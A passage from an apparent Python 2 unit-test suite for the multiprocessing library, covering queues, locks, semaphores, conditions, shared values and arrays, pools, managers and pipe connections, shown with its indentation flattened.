self.assertRaises(Queue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(Queue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(Queue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
def _test_get(self, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(Queue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(Queue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(Queue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(Queue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
def _test_fork(self, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(Queue.Empty, queue.get, False)
p.join()
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
return
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
def _test_task_done(self, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
if sys.version_info < (2, 5) and not hasattr(queue, 'task_done'):
return
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in xrange(4)]
for p in workers:
p.start()
for i in xrange(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
#
#
#
class _TestLock(BaseTestCase):
def test_lock(self):
lock = self.Lock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(False), False)
self.assertEqual(lock.release(), None)
self.assertRaises((ValueError, threading.ThreadError), lock.release)
def test_rlock(self):
lock = self.RLock()
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.acquire(), True)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertEqual(lock.release(), None)
self.assertRaises((AssertionError, RuntimeError), lock.release)
class _TestSemaphore(BaseTestCase):
def _test_semaphore(self, sem):
self.assertReturnsIfImplemented(2, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.acquire(), True)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.acquire(False), False)
self.assertReturnsIfImplemented(0, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(1, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(2, get_value, sem)
def test_semaphore(self):
sem = self.Semaphore(2)
self._test_semaphore(sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(3, get_value, sem)
self.assertEqual(sem.release(), None)
self.assertReturnsIfImplemented(4, get_value, sem)
def test_bounded_semaphore(self):
sem = self.BoundedSemaphore(2)
self._test_semaphore(sem)
# Currently fails on OS/X
#if HAVE_GETVALUE:
# self.assertRaises(ValueError, sem.release)
# self.assertReturnsIfImplemented(2, get_value, sem)
def test_timeout(self):
if self.TYPE != 'processes':
return
sem = self.Semaphore(0)
acquire = TimingWrapper(sem.acquire)
self.assertEqual(acquire(False), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, None), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0.0)
self.assertEqual(acquire(False, TIMEOUT1), False)
self.assertTimingAlmostEqual(acquire.elapsed, 0)
self.assertEqual(acquire(True, TIMEOUT2), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT2)
self.assertEqual(acquire(timeout=TIMEOUT3), False)
self.assertTimingAlmostEqual(acquire.elapsed, TIMEOUT3)
class _TestCondition(BaseTestCase):
def f(self, cond, sleeping, woken, timeout=None):
cond.acquire()
sleeping.release()
cond.wait(timeout)
woken.release()
cond.release()
def check_invariant(self, cond):
# this is only supposed to succeed when there are no sleepers
if self.TYPE == 'processes':
try:
sleepers = (cond._sleeping_count.get_value() -
cond._woken_count.get_value())
self.assertEqual(sleepers, 0)
self.assertEqual(cond._wait_semaphore.get_value(), 0)
except NotImplementedError:
pass
def test_notify(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
p = threading.Thread(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
# wait for both children to start sleeping
sleeping.acquire()
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake up one process/thread
cond.acquire()
cond.notify()
cond.release()
# check one process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(1, get_value, woken)
# wake up another
cond.acquire()
cond.notify()
cond.release()
# check other has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(2, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
p.join()
def test_notify_all(self):
cond = self.Condition()
sleeping = self.Semaphore(0)
woken = self.Semaphore(0)
# start some threads/processes which will timeout
for i in range(3):
p = self.Process(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
p.daemon = True
p.start()
t = threading.Thread(target=self.f,
args=(cond, sleeping, woken, TIMEOUT1))
t.daemon = True
t.start()
# wait for them all to sleep
for i in xrange(6):
sleeping.acquire()
# check they have all timed out
for i in xrange(6):
woken.acquire()
self.assertReturnsIfImplemented(0, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
# start some more threads/processes
for i in range(3):
p = self.Process(target=self.f, args=(cond, sleeping, woken))
p.daemon = True
p.start()
t = threading.Thread(target=self.f, args=(cond, sleeping, woken))
t.daemon = True
t.start()
# wait for them to all sleep
for i in xrange(6):
sleeping.acquire()
# check no process/thread has woken up
time.sleep(DELTA)
self.assertReturnsIfImplemented(0, get_value, woken)
# wake them all up
cond.acquire()
cond.notify_all()
cond.release()
# check they have all woken
time.sleep(DELTA)
self.assertReturnsIfImplemented(6, get_value, woken)
# check state is not mucked up
self.check_invariant(cond)
def test_timeout(self):
cond = self.Condition()
wait = TimingWrapper(cond.wait)
cond.acquire()
res = wait(TIMEOUT1)
cond.release()
self.assertEqual(res, None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
class _TestEvent(BaseTestCase):
def _test_event(self, event):
time.sleep(TIMEOUT2)
event.set()
def test_event(self):
event = self.Event()
wait = TimingWrapper(event.wait)
# Removed temporarily: due to API shear, this does not
# work with threading._Event objects (is_set == isSet).
#self.assertEqual(event.is_set(), False)
self.assertEqual(wait(0.0), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), None)
self.assertTimingAlmostEqual(wait.elapsed, TIMEOUT1)
event.set()
# See note above on the API differences
# self.assertEqual(event.is_set(), True)
self.assertEqual(wait(), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
self.assertEqual(wait(TIMEOUT1), None)
self.assertTimingAlmostEqual(wait.elapsed, 0.0)
# self.assertEqual(event.is_set(), True)
event.clear()
#self.assertEqual(event.is_set(), False)
self.Process(target=self._test_event, args=(event,)).start()
self.assertEqual(wait(), None)
#
#
#
class _TestValue(BaseTestCase):
codes_values = [
('i', 4343, 24234),
('d', 3.625, -4.25),
('h', -232, 234),
('c', latin('x'), latin('y'))
]
def _test(self, values):
for sv, cv in zip(values, self.codes_values):
sv.value = cv[2]
def test_value(self, raw=False):
if self.TYPE != 'processes':
return
if raw:
values = [self.RawValue(code, value)
for code, value, _ in self.codes_values]
else:
values = [self.Value(code, value)
for code, value, _ in self.codes_values]
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[1])
proc = self.Process(target=self._test, args=(values,))
proc.start()
proc.join()
for sv, cv in zip(values, self.codes_values):
self.assertEqual(sv.value, cv[2])
def test_rawvalue(self):
self.test_value(raw=True)
def test_getobj_getlock(self):
if self.TYPE != 'processes':
return
val1 = self.Value('i', 5)
lock1 = val1.get_lock()
obj1 = val1.get_obj()
val2 = self.Value('i', 5, lock=None)
lock2 = val2.get_lock()
obj2 = val2.get_obj()
lock = self.Lock()
val3 = self.Value('i', 5, lock=lock)
lock3 = val3.get_lock()
obj3 = val3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Value('i', 5, lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError, self.Value, 'i', 5, lock='navalue')
arr5 = self.RawValue('i', 5)
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
class _TestArray(BaseTestCase):
def f(self, seq):
for i in range(1, len(seq)):
seq[i] += seq[i-1]
def test_array(self, raw=False):
if self.TYPE != 'processes':
return
seq = [680, 626, 934, 821, 150, 233, 548, 982, 714, 831]
if raw:
arr = self.RawArray('i', seq)
else:
arr = self.Array('i', seq)
self.assertEqual(len(arr), len(seq))
self.assertEqual(arr[3], seq[3])
self.assertEqual(list(arr[2:7]), list(seq[2:7]))
arr[4:8] = seq[4:8] = array.array('i', [1, 2, 3, 4])
self.assertEqual(list(arr[:]), seq)
self.f(seq)
p = self.Process(target=self.f, args=(arr,))
p.start()
p.join()
self.assertEqual(list(arr[:]), seq)
def test_rawarray(self):
self.test_array(raw=True)
def test_getobj_getlock_obj(self):
if self.TYPE != 'processes':
return
arr1 = self.Array('i', range(10))
lock1 = arr1.get_lock()
obj1 = arr1.get_obj()
arr2 = self.Array('i', range(10), lock=None)
lock2 = arr2.get_lock()
obj2 = arr2.get_obj()
lock = self.Lock()
arr3 = self.Array('i', range(10), lock=lock)
lock3 = arr3.get_lock()
obj3 = arr3.get_obj()
self.assertEqual(lock, lock3)
arr4 = self.Array('i', range(10), lock=False)
self.assertFalse(hasattr(arr4, 'get_lock'))
self.assertFalse(hasattr(arr4, 'get_obj'))
self.assertRaises(AttributeError,
self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(range(10))
self.assertEqual(a[:], range(10))
b = self.list()
self.assertEqual(b[:], [])
b.extend(range(5))
self.assertEqual(b[:], range(5))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], range(10))
d = [a, b]
e = self.list(d)
self.assertEqual(
e[:],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[:], [[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello']])
def test_dict(self):
d = self.dict()
indices = range(65, 70)
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
class _TestPool(BaseTestCase):
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, range(10)), map(sqr, range(10)))
self.assertEqual(pmap(sqr, range(100), chunksize=20),
map(sqr, range(100)))
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 0.2))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, range(10))
self.assertEqual(list(it), map(sqr, range(10)))
it = self.pool.imap(sqr, range(10))
for i in range(10):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
it = self.pool.imap(sqr, range(1000), chunksize=100)
for i in range(1000):
self.assertEqual(it.next(), i*i)
self.assertRaises(StopIteration, it.next)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, range(1000))
self.assertEqual(sorted(it), map(sqr, range(1000)))
it = self.pool.imap_unordered(sqr, range(1000), chunksize=53)
self.assertEqual(sorted(it), map(sqr, range(1000)))
def test_make_pool(self):
p = multiprocessing.Pool(3)
self.assertEqual(3, len(p._pool))
p.close()
p.join()
def test_terminate(self):
if self.TYPE == 'manager':
# On Unix a forked process increfs each shared object to
# which its parent process held a reference. If the
# forked process gets terminated then there is likely to
# be a reference leak. So to prevent
# _TestZZZNumberOfObjects from failing we skip this test
# when using a manager.
return
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
self.assertTrue(join.elapsed < 0.2)
#
# Test that manager has expected number of shared objects left
#
class _TestZZZNumberOfObjects(BaseTestCase):
# Because test cases are sorted alphabetically, this one will get
# run after all the other tests for the manager. It tests that
# there have been no "reference leaks" for the manager's shared
# objects. Note the comment in _TestPool.test_terminate().
ALLOWED_TYPES = ('manager',)
def test_number_of_objects(self):
EXPECTED_NUMBER = 1 # the pool object is still alive
multiprocessing.active_children() # discard dead process objs
gc.collect() # do garbage collection
refs = self.manager._number_of_objects()
debug_info = self.manager._debug_info()
if refs != EXPECTED_NUMBER:
print self.manager._debug_info()
print debug_info
self.assertEqual(refs, EXPECTED_NUMBER)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in xrange(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('next', '__next__')
def __iter__(self):
return self
def next(self):
return self._callmethod('next')
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
manager.shutdown()
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = Queue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def _putter(self, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
queue.put(('hello world', None, True, 2.25))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=('localhost', 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
self.assertEqual(queue.get(), ['hello world', None, True, 2.25])
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
manager.shutdown()
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _echo(self, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', range(4))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort, e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(IOError, reader.send, 2)
self.assertRaises(IOError, writer.recv)
self.assertRaises(IOError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
return
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def _test(self, address):
conn = self.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
#
# Test of sending connection and socket objects between processes
#
"""
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _listener(self, conn, families):
for fam in families:
l = self.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
if self.TYPE == 'processes':
l = socket.socket()
l.bind(('localhost', 0))
conn.send(l.getsockname())
l.listen(1)
new_conn, addr = l.accept()
conn.send(new_conn)
conn.recv()
def _remote(self, conn):
for (address, msg) in iter(conn.recv, None):
client = self.connection.Client(address)
client.send(msg.upper())
client.close()
if self.TYPE == 'processes':
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
try:
multiprocessing.allow_connection_pickling()
except ImportError:
return
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
if self.TYPE == 'processes':
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
if hasattr(socket, 'fromfd'):
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(100), msg.upper())
else:
# XXX On Windows with Py2.6 need to backport fromfd()
discard = lconn.recv_bytes()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
"""
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# create and destroy lots of blocks of different sizes
for i in xrange(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
# verify the state of the heap
all = []
occupied = 0
for L in heap._len_to_seq.values():
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
for arena, start, stop in heap._allocated_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
self.assertTrue((arena != narena and nstart == 0) or
(stop == nstart))
#
#
#
try:
from ctypes import Structure, Value, copy, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _double(self, x, y, foo, arr, string):
x.value *= 2
y.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
if c_int is None:
return
x = Value('i', 7, lock=lock)
y = Value(ctypes.c_double, 1.0/3.0, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = Array('d', range(10), lock=lock)
string = Array('c', 20, lock=lock)
string.value = 'hello'
p = self.Process(target=self._double, args=(x, y, foo, arr, string))
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
if c_int is None:
return
foo = _Foo(2, 5.0)
bar = copy(foo)
foo.x = 0
foo.y = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
#
#
#
class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def _test_finalize(self, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
# call multiprocessing's cleanup function then exit process without
# garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
#
# Test that from ... import * works for each module
#
class _TestImportStar(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_import(self):
modules = (
'multiprocessing', 'multiprocessing.connection',
'multiprocessing.heap', 'multiprocessing.managers',
'multiprocessing.pool', 'multiprocessing.process',
'multiprocessing.reduction', 'multiprocessing.sharedctypes',
'multiprocessing.synchronize', 'multiprocessing.util'
)
for name in modules:
__import__(name)
mod = sys.modules[name]
for attr in getattr(mod, '__all__', ()):
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
def _test_level(self, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
